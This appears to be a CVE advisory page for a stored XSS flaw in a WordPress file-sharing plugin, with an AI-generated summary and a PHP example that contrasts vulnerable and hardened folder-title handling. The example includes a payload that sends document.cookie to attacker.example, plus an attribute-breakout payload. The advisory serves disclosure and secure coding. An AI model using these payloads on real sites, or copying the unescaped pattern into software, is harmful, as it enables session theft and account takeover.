CVE-2026-10093
Description
Stored XSS in WordPress File Sharing & Download Manager plugin via unsanitized 'fldr_ttl' parameter allows subscriber-level attackers to inject arbitrary scripts.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The File Sharing & Download Manager – User Private Files plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in all versions up to and including 2.1.6. The vulnerability exists in the inc/functions-folder.php file at line 463 [1], where the fldr_ttl parameter (the folder title) is insufficiently sanitized and escaped before being stored. This allows authenticated attackers with subscriber-level access or higher to inject arbitrary web scripts that execute whenever a user accesses a page that renders the stored title.
Exploitation
An attacker must be authenticated with at least subscriber-level access. The attacker can create or edit a folder and supply a malicious payload in the fldr_ttl parameter. The injected script is stored in the database and rendered without proper escaping on pages that display folder titles, such as the shared files view. No additional user interaction beyond viewing the page is required for the script to execute.
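The pattern described above, as an added illustration rather than the plugin's own code: a folder title is read from the request, stored verbatim, and later concatenated into HTML, beside the hardened version that sanitizes on input and escapes on output with the escaper matching the output context. The function names, the in-memory $folders array and the two payloads are constructed stand-ins; only sanitize_text_field(), wp_unslash(), esc_html() and esc_attr() are real WordPress helpers, and the shims let the file run under plain CLI php outside WordPress. The changeset cited in the references is to templates/files-shared.php, i.e. the render side, which is where output escaping belongs.

```php
<?php
// Added illustrative example for CVE-2026-10093; not code from the
// User Private Files plugin. The functions and the in-memory $folders array are
// hypothetical stand-ins for the plugin's own storage and templates. Only
// sanitize_text_field(), wp_unslash(), esc_html() and esc_attr() are real
// WordPress helpers; the shims below let the file run under plain CLI php.

if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('wp_unslash')) {
    function wp_unslash(string $value): string { return stripslashes($value); }
}
if (!function_exists('sanitize_text_field')) {
    // Approximation of WordPress behaviour: strip tags and control characters,
    // collapse whitespace to a single trimmed line.
    function sanitize_text_field(string $text): string {
        $text = strip_tags($text);
        $text = preg_replace('/[\x00-\x1F\x7F]+/', ' ', $text);
        return trim(preg_replace('/ {2,}/', ' ', $text));
    }
}

// Vulnerable pattern (what the advisory describes): the request value is
// stored verbatim and later concatenated into HTML without escaping.
function store_folder_title_vulnerable(array &$folders, int $id, array $request): void {
    $folders[$id] = $request['fldr_ttl'];
}
function render_folder_title_vulnerable(array $folders, int $id): string {
    $title = $folders[$id];
    return '<li class="upf-folder" data-title="' . $title . '">' . $title . '</li>';
}

// Hardened pattern: sanitize on the way in, escape on the way out with the
// escaper that matches the output context (esc_attr inside an attribute,
// esc_html in a text node). Output escaping is the control that stops the
// script from running; sanitization is defence in depth, since a stored title
// may be rendered by more than one template.
function store_folder_title_hardened(array &$folders, int $id, array $request): void {
    $folders[$id] = sanitize_text_field(wp_unslash($request['fldr_ttl'] ?? ''));
}
function render_folder_title_hardened(array $folders, int $id): string {
    $title = $folders[$id] ?? '';
    return '<li class="upf-folder" data-title="' . esc_attr($title) . '">' . esc_html($title) . '</li>';
}

// Constructed payloads a subscriber could submit as fldr_ttl: one targets the
// text node, the other breaks out of the attribute.
$payloads = [
    'Reports<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'Reports" onmouseover="alert(document.domain)',
];

$folders = [];
foreach ($payloads as $i => $payload) {
    $request = ['fldr_ttl' => $payload];

    store_folder_title_vulnerable($folders, $i, $request);
    $vuln = render_folder_title_vulnerable($folders, $i);

    store_folder_title_hardened($folders, 100 + $i, $request);
    $safe = render_folder_title_hardened($folders, 100 + $i);

    echo "vulnerable: $vuln\n";
    echo "hardened:   $safe\n\n";

    // Self-check: the hardened markup contains no script tag and no raw quote
    // from the title (only the four quotes of the two fixed attributes remain).
    assert(strpos($safe, '<script') === false);
    assert(substr_count($safe, '"') === 4);
    assert(strpos(esc_html($payload), '<') === false);
}
```

Run it with `php example.php`: the vulnerable lines show the script element intact and the second payload closing the data-title attribute to add an onmouseover handler, while the hardened lines render both payloads as inert text. Escaping must match the context of each output point; esc_html in an attribute or esc_attr in a URL is the usual way a fix like this is left incomplete.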
Impact
Successful exploitation enables the attacker to execute arbitrary JavaScript in the victim's browser within the victim's session on the affected site. This can lead to session hijacking, credential theft, defacement, or other actions performed with the victim's privileges. The impact is limited to users who view the compromised folder listing; since the damage scales with the viewer's role, an administrator viewing the listing gives the attacker administrator-level actions on the site.
Mitigation
The vulnerability has been fixed in version 2.1.7 of the plugin, as indicated by the changeset [4]. Users are strongly advised to update to 2.1.7 or later immediately. No workaround is documented for unpatched versions. This vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on Jun 16, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- (no CPE) range: <=2.1.6
Patches
- r3565400
References
- plugins.trac.wordpress.org/browser/user-private-files/tags/2.1.6/inc/functions-folder.php (NVD)
- plugins.trac.wordpress.org/browser/user-private-files/tags/2.1.6/templates/files-shared.php (NVD)
- plugins.trac.wordpress.org/browser/user-private-files/tags/2.1.6/templates/files.php (NVD)
- plugins.trac.wordpress.org/browser/user-private-files/tags/2.1.6/templates/render.php (NVD)
- plugins.trac.wordpress.org/changeset/3565400/user-private-files/trunk/templates/files-shared.php (NVD)
- plugins.trac.wordpress.org/changeset (NVD)
- www.wordfence.com/threat-intel/vulnerabilities/id/5ee0dd57-6256-4a56-907e-89336f052b6d (NVD)